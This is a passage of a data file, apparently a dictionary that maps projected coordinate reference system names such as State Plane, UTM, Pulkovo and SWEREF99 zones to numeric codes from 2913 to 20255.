'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2913, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2914, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100_Feet': 2915, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201_Feet': 2916, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2917, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203_Feet': 2918, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2919, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205_Feet': 2920, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2921, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2922, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2923, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501_Feet': 2924, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502_Feet': 2925, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601_Feet': 2926, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602_Feet': 2927, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2928, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2929, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2930, 'Beduaram_TM_13_NE': 2931, 'QND_1995_Qatar_National_Grid': 2932, 'Gunung_Segara_UTM_Zone_50S': 
2933, 'Pulkovo_1942_CS63_Zone_A1': 2935, 'Pulkovo_1942_CS63_Zone_A2': 2936, 'Pulkovo_1942_CS63_Zone_A3': 2937, 'Pulkovo_1942_CS63_Zone_A4': 2938, 'Pulkovo_1942_CS63_Zone_K2': 2939, 'Pulkovo_1942_CS63_Zone_K3': 2940, 'Pulkovo_1942_CS63_Zone_K4': 2941, 'Porto_Santo_1936_UTM_Zone_28N': 2942, 'Selvagem_Grande_1938_UTM_Zone_28N': 2943, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2944, 'NAD_1983_CSRS_MTM_3': 2945, 'NAD_1983_CSRS_MTM_4': 2946, 'NAD_1983_CSRS_MTM_5': 2947, 'NAD_1983_CSRS_MTM_6': 2948, 'NAD_1983_CSRS_MTM_7': 2949, 'NAD_1983_CSRS_MTM_8': 2950, 'NAD_1983_CSRS_MTM_9': 2951, 'NAD_1983_CSRS_MTM_10': 2952, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2953, 'NAD_1983_CSRS_Prince_Edward_Island': 2954, 'NAD_1983_CSRS_UTM_Zone_11N': 2955, 'NAD_1983_CSRS_UTM_Zone_12N': 2956, 'NAD_1983_CSRS_UTM_Zone_13N': 2957, 'NAD_1983_CSRS_UTM_Zone_17N': 2958, 'NAD_1983_CSRS_UTM_Zone_18N': 2959, 'NAD_1983_CSRS_UTM_Zone_19N': 2960, 'NAD_1983_CSRS_UTM_Zone_20N': 2961, 'NAD_1983_CSRS_UTM_Zone_21N': 2962, 'NAD_1927_Alaska_Albers_Feet': 2964, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2965, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2966, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301_Feet': 2967, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302_Feet': 2968, 'Fort_Marigot_UTM_20N': 2969, 'Sainte_Anne_UTM_20N': 2970, 'CSG_1967_UTM_22N': 2971, 'RGFG_1995_UTM_22N': 2972, 'Fort_Desaix_UTM_20N': 2973, 'RGR_1992_UTM_40S': 2975, 'Tahiti_1952_UTM_6S': 2976, 'Tahaa_1954_UTM_5S': 2977, 'IGN72_Nuku_Hiva_UTM_7S': 2978, 'K0_1949_UTM_42S': 2979, 'Combani_1950_UTM_38S': 2980, 'IGN56_Lifou_UTM_58S': 2981, 'IGN72_Grande_Terre_UTM_58S': 2982, 'RGNC_1991_Lambert_New_Caledonia': 2984, 'Petrels_1972_Terre_Adelie_Polar_Stereographic': 2985, 'Perroud_1950_Terre_Adelie_Polar_Stereographic': 2986, 'Saint_Pierre_et_Miquelon_1950_UTM_21N': 2987, 'MOP78_UTM_1S': 2988, 'RRAF_1991_UTM_20N': 2989, 'NAD_1983_Oregon_Statewide_Lambert': 2991, 'NAD_1983_Oregon_Statewide_Lambert_Feet_Intl': 2992, 
'NAD_1983_HARN_Oregon_Statewide_Lambert': 2993, 'NAD_1983_HARN_Oregon_Statewide_Lambert_Feet_Intl': 2994, 'IGN53_Mare_UTM_58S': 2995, 'ST84_Ile_des_Pins_UTM_58S': 2996, 'ST71_Belep_UTM_58S': 2997, 'NEA74_Noumea_UTM_58S': 2998, 'Grand_Comoros_UTM_38S': 2999, 'Gunung_Segara_NEIEZ': 3000, 'Batavia_NEIEZ': 3001, 'Makassar_NEIEZ': 3002, 'Monte_Mario_Italy_1': 3003, 'Monte_Mario_Italy_2': 3004, 'NAD_1983_BC_Environment_Albers': 3005, 'SWEREF99_TM': 3006, 'SWEREF99_12_00': 3007, 'SWEREF99_13_30': 3008, 'SWEREF99_15_00': 3009, 'SWEREF99_16_30': 3010, 'SWEREF99_18_00': 3011, 'SWEREF99_14_15': 3012, 'SWEREF99_15_45': 3013, 'SWEREF99_17_15': 3014, 'SWEREF99_18_45': 3015, 'SWEREF99_20_15': 3016, 'SWEREF99_21_45': 3017, 'SWEREF99_23_15': 3018, 'RT90_75_gon_V': 3019, 'RT90_5_gon_V': 3020, 'RT90_25_gon_V': 3021, 'RT90_0_gon': 3022, 'RT90_25_gon_O': 3023, 'RT90_5_gon_O': 3024, 'RT38_75_gon_V': 3025, 'RT38_5_gon_V': 3026, 'RT38_25_gon_V': 3027, 'RT38_0_gon': 3028, 'RT38_25_gon_O': 3029, 'RT38_5_gon_O': 3030, 'WGS_1984_Antarctic_Polar_Stereographic': 3031, 'WGS_1984_Australian_Antarctic_Polar_Stereographic': 3032, 'WGS_1984_Australian_Antarctic_Lambert': 3033, 'ETRS_1989_LCC': 3034, 'ETRS_1989_LAEA': 3035, 'Moznet_UTM_Zone_36S': 3036, 'Moznet_UTM_Zone_37S': 3037, 'Hjorsey_1955_UTM_Zone_26N': 3054, 'Hjorsey_1955_UTM_Zone_27N': 3055, 'Hjorsey_1955_UTM_Zone_28N': 3056, 'ISN_1993_Lambert_1993': 3057, 'Helle_1954_Jan_Mayen_Grid': 3058, 'LKS_1992_Latvia_TM': 3059, 'IGN72_Grande_Terre_UTM_58S': 3060, 'Porto_Santo_1995_UTM_Zone_28N': 3061, 'Azores_Oriental_1995_UTM_Zone_26N': 3062, 'Azores_Central_1995_UTM_Zone_26N': 3063, 'IGM_1995_UTM_Zone_32N': 3064, 'IGM_1995_UTM_Zone_33N': 3065, 'ED_1950_Jordan_TM': 3066, 'EUREF_FIN_TM35FIN': 3067, 'DHDN_Soldner_Berlin': 3068, 'NAD_1927_Wisconsin_TM': 3069, 'NAD_1983_Wisconsin_TM': 3070, 'NAD_1983_HARN_Wisconsin_TM': 3071, 'NAD_1983_Maine_2000_East_Zone': 3072, 'NAD_1983_Maine_2000_Central_Zone': 3073, 'NAD_1983_Maine_2000_West_Zone': 3074, 
'NAD_1983_HARN_Maine_2000_East_Zone': 3075, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3076, 'NAD_1983_HARN_Maine_2000_West_Zone': 3077, 'NAD_1983_Michigan_GeoRef_Meters': 3078, 'NAD_1983_HARN_Michigan_GeoRef_Meters': 3079, 'NAD_1927_Texas_Statewide_Mapping_System': 3080, 'NAD_1983_Texas_Statewide_Mapping_System': 3081, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 3082, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 3083, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Lambert': 3084, 'NAD_1983_HARN_Texas_Centric_Mapping_System_Albers': 3085, 'NAD_1983_Florida_GDL_Albers': 3086, 'NAD_1983_HARN_Florida_GDL_Albers': 3087, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 3088, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 3089, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 3090, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600_Feet': 3091, 'Tokyo_UTM_Zone_51N': 3092, 'Tokyo_UTM_Zone_52N': 3093, 'Tokyo_UTM_Zone_53N': 3094, 'Tokyo_UTM_Zone_54N': 3095, 'Tokyo_UTM_Zone_55N': 3096, 'JGD_2000_UTM_Zone_51N': 3097, 'JGD_2000_UTM_Zone_52N': 3098, 'JGD_2000_UTM_Zone_53N': 3099, 'JGD_2000_UTM_Zone_54N': 3100, 'JGD_2000_UTM_Zone_55N': 3101, 'Samoa_1962_Samoa_Lambert': 3102, 'Gulshan_303_Bangladesh_TM': 3106, 'GDA_1994_South_Australia_Lambert': 3107, 'ETRS_1989_Guernsey_Grid': 3108, 'ETRS_1989_Jersey_Transverse_Mercator': 3109, 'AGD_1966_VICGRID': 3110, 'GDA_1994_VICGRID94': 3111, 'GDA_1994_Geoscience_Australia_Lambert': 3112, 'GDA_1994_BCSG02': 3113, 'MAGNA_Colombia_Oeste_Oeste': 3114, 'MAGNA_Colombia_Oeste': 3115, 'MAGNA_Colombia_Bogota': 3116, 'MAGNA_Colombia_Este': 3117, 'MAGNA_Colombia_Este_Este': 3118, 'Douala_1948_AEF_West': 3119, 'Pulkovo_1942_Adj_1958_Poland_Zone_I': 3120, 'Philippines_Zone_I': 3121, 'Philippines_Zone_II': 3122, 'Philippines_Zone_III': 3123, 'Philippines_Zone_IV': 3124, 'Philippines_Zone_V': 3125, 'ETRS_1989_ETRS-GK19FIN': 3126, 'ETRS_1989_ETRS-GK20FIN': 3127, 'ETRS_1989_ETRS-GK21FIN': 3128, 'ETRS_1989_ETRS-GK22FIN': 3129, 'ETRS_1989_ETRS-GK23FIN': 3130, 
'ETRS_1989_ETRS-GK24FIN': 3131, 'ETRS_1989_ETRS-GK25FIN': 3132, 'ETRS_1989_ETRS-GK26FIN': 3133, 'ETRS_1989_ETRS-GK27FIN': 3134, 'ETRS_1989_ETRS-GK28FIN': 3135, 'ETRS_1989_ETRS-GK29FIN': 3136, 'ETRS_1989_ETRS-GK30FIN': 3137, 'ETRS_1989_ETRS-GK31FIN': 3138, 'Fiji_1956_UTM_Zone_60S': 3141, 'Fiji_1956_UTM_Zone_1S': 3142, 'Indian_1960_UTM_Zone_48N': 3148, 'Indian_1960_UTM_Zone_49N': 3149, 'NAD_1983_CSRS_BC_Environment_Albers': 3153, 'NAD_1983_CSRS_UTM_Zone_7N': 3154, 'NAD_1983_CSRS_UTM_Zone_8N': 3155, 'NAD_1983_CSRS_UTM_Zone_9N': 3156, 'NAD_1983_CSRS_UTM_Zone_10N': 3157, 'NAD_1983_CSRS_UTM_Zone_14N': 3158, 'NAD_1983_CSRS_UTM_Zone_15N': 3159, 'NAD_1983_CSRS_UTM_Zone_16N': 3160, 'NAD_1983_Ontario_MNR_Lambert': 3161, 'NAD_1983_CSRS_Ontario_MNR_Lambert': 3162, 'RGNC_1991_93_Lambert_New_Caledonia': 3163, 'ST87_Ouvea_UTM_58S': 3164, 'NEA74_Noumea_Lambert': 3165, 'NEA74_Noumea_Lambert_2': 3166, 'RGNC_1991-93_UTM_Zone_57S': 3169, 'RGNC_1991-93_UTM_Zone_58S': 3170, 'RGNC_1991-93_UTM_Zone_59S': 3171, 'IGN53_Mare_UTM_Zone_59S': 3172, 'NAD_1983_Great_Lakes_Basin_Albers': 3174, 'NAD_1983_Great_Lakes_and_St_Lawrence_Albers': 3175, 'Indian_1960_TM_106NE': 3176, 'LGD2006_Libya_TM': 3177, 'Greenland_1996_UTM_Zone_18N': 3178, 'Greenland_1996_UTM_Zone_19N': 3179, 'Greenland_1996_UTM_Zone_20N': 3180, 'Greenland_1996_UTM_Zone_21N': 3181, 'Greenland_1996_UTM_Zone_22N': 3182, 'Greenland_1996_UTM_Zone_23N': 3183, 'Greenland_1996_UTM_Zone_24N': 3184, 'Greenland_1996_UTM_Zone_25N': 3185, 'Greenland_1996_UTM_Zone_26N': 3186, 'Greenland_1996_UTM_Zone_27N': 3187, 'Greenland_1996_UTM_Zone_28N': 3188, 'Greenland_1996_UTM_Zone_29N': 3189, 'LGD2006_Libya_TM_Zone_5': 3190, 'LGD2006_Libya_TM_Zone_6': 3191, 'LGD2006_Libya_TM_Zone_7': 3192, 'LGD2006_Libya_TM_Zone_8': 3193, 'LGD2006_Libya_TM_Zone_9': 3194, 'LGD2006_Libya_TM_Zone_10': 3195, 'LGD2006_Libya_TM_Zone_11': 3196, 'LGD2006_Libya_TM_Zone_12': 3197, 'LGD2006_Libya_TM_Zone_13': 3198, 'LGD2006_UTM_Zone_32N': 3199, 'FD_1958_Iraq': 3200, 
'LGD2006_UTM_Zone_33N': 3201, 'LGD2006_UTM_Zone_34N': 3202, 'LGD2006_UTM_Zone_35N': 3203, 'WGS_1984_USGS_Transantarctic_Mountains': 3294, 'RGPF_UTM_Zone_5S': 3296, 'RGPF_UTM_Zone_6S': 3297, 'RGPF_UTM_Zone_7S': 3298, 'RGPF_UTM_Zone_8S': 3299, 'Estonian_Coordinate_System_of_1992': 3300, 'Estonia_1997_Estonia_National_Grid': 3301, 'IGN63_Hiva_Oa_UTM_Zone_7S': 3302, 'Fatu_Iva_1972_UTM_Zone_7S': 3303, 'Tahiti_1979_UTM_Zone_6S': 3304, 'Moorea_1987_UTM_Zone_6S': 3305, 'Maupiti_1983_UTM_Zone_5S': 3306, 'Nakhl-e_Ghanem_UTM_Zone_39N': 3307, 'GDA_1994_NSW_lambert': 3308, 'NAD_1927_California_Teale_Albers': 3309, 'NAD_1983_California_Teale_Albers': 3310, 'NAD_1983_HARN_California_Teale_Albers': 3311, 'CSG_1967_UTM_Zone_21N': 3312, 'RGFG_1995_UTM_Zone_21N': 3313, 'Katanga_1955_Katanga_Lambert': 3314, 'Katanga_1955_Katanga_TM': 3315, 'Kasai_1953_Congo_TM_Zone_22': 3316, 'Kasai_1953_Congo_TM_Zone_24': 3317, 'IGC_1962_Congo_TM_Zone_12': 3318, 'IGC_1962_Congo_TM_Zone_14': 3319, 'IGC_1962_Congo_TM_Zone_16': 3320, 'IGC_1962_Congo_TM_Zone_18': 3321, 'IGC_1962_Congo_TM_Zone_20': 3322, 'IGC_1962_Congo_TM_Zone_22': 3323, 'IGC_1962_Congo_TM_Zone_24': 3324, 'IGC_1962_Congo_TM_Zone_26': 3325, 'IGC_1962_Congo_TM_Zone_28': 3326, 'IGC_1962_Congo_TM_Zone_30': 3327, 'Pulkovo_1942_Adj_1958_GUGiK-80': 3328, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_5': 3329, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_6': 3330, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_7': 3331, 'Pulkovo_1942_Adj_1958_3_Degree_GK_Zone_8': 3332, 'Pulkovo_1942_Adj_1958_GK_Zone_3': 3333, 'Pulkovo_1942_Adj_1958_GK_Zone_4': 3334, 'Pulkovo_1942_Adj_1958_GK_Zone_5': 3335, 'Kerguelen_Island_1949_UTM_42S': 3336, 'Le_Pouce_1934_Mauritius_Grid': 3337, 'NAD_1983_Alaska_Albers': 3338, 'IGCB_1955_Congo_TM_Zone_12': 3339, 'IGCB_1955_Congo_TM_Zone_14': 3340, 'IGCB_1955_Congo_TM_Zone_16': 3341, 'IGCB_1955_UTM_Zone_33S': 3342, 'Mauritania_1999_UTM_Zone_28N': 3343, 'Mauritania_1999_UTM_Zone_29N': 3344, 'Mauritania_1999_UTM_Zone_30N': 3345, 
'LKS_1994_Lithuania_TM': 3346, 'NAD_1983_Statistics_Canada_Lambert': 3347, 'NAD_1983_CSRS_Statistics_Canada_Lambert': 3348, 'WGS_1984_PDC_Mercator': 3349, 'Pulkovo_1942_CS63_Zone_K0': 3350, 'Pulkovo_1942_CS63_Zone_K1': 3351, 'Pulkovo_1942_CS63_Zone_K2': 3352, 'Mhast_Onshore_UTM_Zone_32S': 3353, 'Mhast_Offshore_UTM_Zone_32S': 3354, 'Egypt_Gulf_of_Suez_S-650_TL_Red_Belt': 3355, 'Grand_Cayman_1959_UTM_Zone_17N': 3356, 'Little_Cayman_1961_UTM_Zone_17N': 3357, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200': 3358, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3359, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900': 3360, 'NAD_1983_HARN_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 3361, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701': 3362, 'NAD_1983_HARN_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 3363, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702': 3364, 'NAD_1983_HARN_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 3365, 'Hong_Kong_1963_Grid_System': 3366, 'IGN_Astro_1960_UTM_Zone_28N': 3367, 'IGN_Astro_1960_UTM_Zone_29N': 3368, 'IGN_Astro_1960_UTM_Zone_30N': 3369, 'NAD_1927_UTM_Zone_59N': 3370, 'NAD_1927_UTM_Zone_60N': 3371, 'NAD_1983_UTM_Zone_59N': 3372, 'NAD_1983_UTM_Zone_60N': 3373, 'FD_1954_UTM_Zone_29N': 3374, 'GDM_2000_MRSO_Peninsular_Malaysia': 3375, 'GDM_2000_BRSO_East_Malaysia': 3376, 'GDM_2000_State_Cassini_Johor': 3377, 'GDM_2000_State_Cassini_Negeri_Sembilan_&_Melaka': 3378, 'GDM_2000_State_Cassini_Pahang': 3379, 'GDM_2000_State_Cassini_Selangor': 3380, 'GDM_2000_State_Cassini_Terengganu': 3381, 'GDM_2000_State_Cassini_Pulau_Pinang_&_Seberang_Perai': 3382, 'GDM_2000_State_Cassini_Perlis': 3383, 'GDM_2000_State_Cassini_Perak': 3384, 'GDM_2000_State_Cassini_Kelantan': 3385, 'KKJ_Finland_Zone_0': 3386, 'KKJ_Finland_Zone_5': 3387, 'Pulkovo_1942_Caspian_Sea_Mercator': 3388, 'Karbala_1979_Polservice_UTM_Zone_37N': 3391, 'Karbala_1979_Polservice_UTM_Zone_38N': 3392, 'Karbala_1979_Polservice_UTM_Zone_39N': 3393, 
'Nahrwan_1934_Iraq_Zone': 3394, 'WGS_1984_World_Mercator': 3395, 'PD/83_GK_Zone_3': 3396, 'PD/83_GK_Zone_4': 3397, 'RD/83_GK_Zone_4': 3398, 'RD/83_GK_Zone_5': 3399, 'NAD_1983_10TM_AEP_Forest': 3400, 'NAD_1983_10TM_AEP_Resource': 3401, 'NAD_1983_CSRS_10TM_AEP_Forest': 3402, 'NAD_1983_CSRS_10TM_AEP_Resource': 3403, 'NAD_1983_HARN_StatePlane_North_Carolina_FIPS_3200_Feet': 3404, 'VN_2000_UTM_Zone_48N': 3405, 'VN_2000_UTM_Zone_49N': 3406, 'Hong_Kong_1963_Grid_System': 3407, 'NSIDC_EASE_Grid_North': 3408, 'NSIDC_EASE_Grid_South': 3409, 'NSIDC_EASE_Grid_Global': 3410, 'NSIDC_Sea_Ice_Polar_Stereographic_North': 3411, 'NSIDC_Sea_Ice_Polar_Stereographic_South': 3412, 'WGS_1984_NSIDC_Sea_Ice_Polar_Stereographic_North': 3413, 'SVY21_Singapore_TM': 3414, 'WGS_1972_BE_South_China_Sea_Lambert': 3415, 'ETRS_1989_Austria_Lambert': 3416, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 3417, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 3418, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 3419, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 3420, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 3421, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 3422, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 3423, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 3424, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401_Feet': 3425, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402_Feet': 3426, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501_Feet': 3427, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502_Feet': 3428, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701_Feet': 3429, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702_Feet': 3430, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703_Feet': 3431, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900_Feet': 3432, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 3433, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 3434, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 3435, 
'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 3436, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 3437, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 3438, 'PDO_1993_UTM_Zone_39N': 3439, 'PDO_1993_UTM_Zone_40N': 3440, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301_Feet': 3441, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302_Feet': 3442, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201_Feet': 3443, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202_Feet': 3444, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800_Feet': 3445, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800_Feet': 3446, 'Belge_Lambert_2005': 3447, 'JAD_2001_Jamaica_Grid': 3448, 'JAD_2001_UTM_Zone_17N': 3449, 'JAD_2001_UTM_Zone_18N': 3450, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703_Feet': 3453, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701_Feet': 3456, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702_Feet': 3457, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001_Feet': 3458, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002_Feet': 3459, 'Fiji_1986_Fiji_Map_Grid': 3460, 'Dabola_1981_UTM_Zone_28N': 3461, 'Dabola_1981_UTM_Zone_29N': 3462, 'NAD_1983_Maine_2000_Central_Zone': 3463, 'NAD_1983_HARN_Maine_2000_Central_Zone': 3464, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 3560, 'Old_Hawaiian_StatePlane_Hawaii_1_FIPS_5101': 3561, 'Old_Hawaiian_StatePlane_Hawaii_2_FIPS_5102': 3562, 'Old_Hawaiian_StatePlane_Hawaii_3_FIPS_5103': 3563, 'Old_Hawaiian_StatePlane_Hawaii_4_FIPS_5104': 3564, 'Old_Hawaiian_StatePlane_Hawaii_5_FIPS_5105': 3565, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 3566, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 3567, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet': 3568, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet': 3569, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet': 3570, 'WGS_1984_North_Pole_LAEA_Bering_Sea': 3571, 'WGS_1984_North_Pole_LAEA_Alaska': 3572, 'WGS_1984_North_Pole_LAEA_Canada': 3573, 
'WGS_1984_North_Pole_LAEA_Atlantic': 3574, 'WGS_1984_North_Pole_LAEA_Europe': 3575, 'WGS_1984_North_Pole_LAEA_Russia': 3576, 'GDA_1994_Australia_Albers': 3577, 'NAD_1983_Yukon_Albers': 3578, 'NAD_1983_CSRS_Yukon_Albers': 3579, 'NAD_1983_Northwest_Territories_Lambert': 3580, 'NAD_1983_CSRS_Northwest_Territories_Lambert': 3581, 'Reunion_1947_TM_Reunion': 3727, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 3734, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 3735, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 3736, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3737, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3738, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 3739, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401_Feet': 3753, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402_Feet': 3754, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901_Feet': 3755, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 3756, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 3757, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904_Feet': 3758, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 3759, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 3760, 'NAD_1983_CSRS_UTM_Zone_22N': 3761, 'WGS_1984_South_Georgia_Lambert': 3762, 'ETRS_1989_Portugal_TM06': 3763, 'Puerto_Rico_UTM_Zone_20N': 3920, 'Puerto_Rico_StatePlane_Puerto_Rico_FIPS_5201': 3991, 'Puerto_Rico_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 3992, 'Pulkovo_1995_GK_Zone_2': 20002, 'Pulkovo_1995_GK_Zone_3': 20003, 'Pulkovo_1995_GK_Zone_4': 20004, 'Pulkovo_1995_GK_Zone_5': 20005, 'Pulkovo_1995_GK_Zone_6': 20006, 'Pulkovo_1995_GK_Zone_7': 20007, 'Pulkovo_1995_GK_Zone_8': 20008, 'Pulkovo_1995_GK_Zone_9': 20009, 'Pulkovo_1995_GK_Zone_10': 20010, 'Pulkovo_1995_GK_Zone_11': 20011, 'Pulkovo_1995_GK_Zone_12': 20012, 'Pulkovo_1995_GK_Zone_13': 20013, 'Pulkovo_1995_GK_Zone_14': 20014, 'Pulkovo_1995_GK_Zone_15': 20015, 'Pulkovo_1995_GK_Zone_16': 20016, 
'Pulkovo_1995_GK_Zone_17': 20017, 'Pulkovo_1995_GK_Zone_18': 20018, 'Pulkovo_1995_GK_Zone_19': 20019, 'Pulkovo_1995_GK_Zone_20': 20020, 'Pulkovo_1995_GK_Zone_21': 20021, 'Pulkovo_1995_GK_Zone_22': 20022, 'Pulkovo_1995_GK_Zone_23': 20023, 'Pulkovo_1995_GK_Zone_24': 20024, 'Pulkovo_1995_GK_Zone_25': 20025, 'Pulkovo_1995_GK_Zone_26': 20026, 'Pulkovo_1995_GK_Zone_27': 20027, 'Pulkovo_1995_GK_Zone_28': 20028, 'Pulkovo_1995_GK_Zone_29': 20029, 'Pulkovo_1995_GK_Zone_30': 20030, 'Pulkovo_1995_GK_Zone_31': 20031, 'Pulkovo_1995_GK_Zone_32': 20032, 'Pulkovo_1995_GK_Zone_2N': 20062, 'Pulkovo_1995_GK_Zone_3N': 20063, 'Pulkovo_1995_GK_Zone_4N': 20064, 'Pulkovo_1995_GK_Zone_5N': 20065, 'Pulkovo_1995_GK_Zone_6N': 20066, 'Pulkovo_1995_GK_Zone_7N': 20067, 'Pulkovo_1995_GK_Zone_8N': 20068, 'Pulkovo_1995_GK_Zone_9N': 20069, 'Pulkovo_1995_GK_Zone_10N': 20070, 'Pulkovo_1995_GK_Zone_11N': 20071, 'Pulkovo_1995_GK_Zone_12N': 20072, 'Pulkovo_1995_GK_Zone_13N': 20073, 'Pulkovo_1995_GK_Zone_14N': 20074, 'Pulkovo_1995_GK_Zone_15N': 20075, 'Pulkovo_1995_GK_Zone_16N': 20076, 'Pulkovo_1995_GK_Zone_17N': 20077, 'Pulkovo_1995_GK_Zone_18N': 20078, 'Pulkovo_1995_GK_Zone_19N': 20079, 'Pulkovo_1995_GK_Zone_20N': 20080, 'Pulkovo_1995_GK_Zone_21N': 20081, 'Pulkovo_1995_GK_Zone_22N': 20082, 'Pulkovo_1995_GK_Zone_23N': 20083, 'Pulkovo_1995_GK_Zone_24N': 20084, 'Pulkovo_1995_GK_Zone_25N': 20085, 'Pulkovo_1995_GK_Zone_26N': 20086, 'Pulkovo_1995_GK_Zone_27N': 20087, 'Pulkovo_1995_GK_Zone_28N': 20088, 'Pulkovo_1995_GK_Zone_29N': 20089, 'Pulkovo_1995_GK_Zone_30N': 20090, 'Pulkovo_1995_GK_Zone_31N': 20091, 'Pulkovo_1995_GK_Zone_32N': 20092, 'Adindan_UTM_Zone_35N': 20135, 'Adindan_UTM_Zone_36N': 20136, 'Adindan_UTM_Zone_37N': 20137, 'Adindan_UTM_Zone_38N': 20138, 'AGD_1966_AMG_Zone_48': 20248, 'AGD_1966_AMG_Zone_49': 20249, 'AGD_1966_AMG_Zone_50': 20250, 'AGD_1966_AMG_Zone_51': 20251, 'AGD_1966_AMG_Zone_52': 20252, 'AGD_1966_AMG_Zone_53': 20253, 'AGD_1966_AMG_Zone_54': 20254, 'AGD_1966_AMG_Zone_55': 20255, 
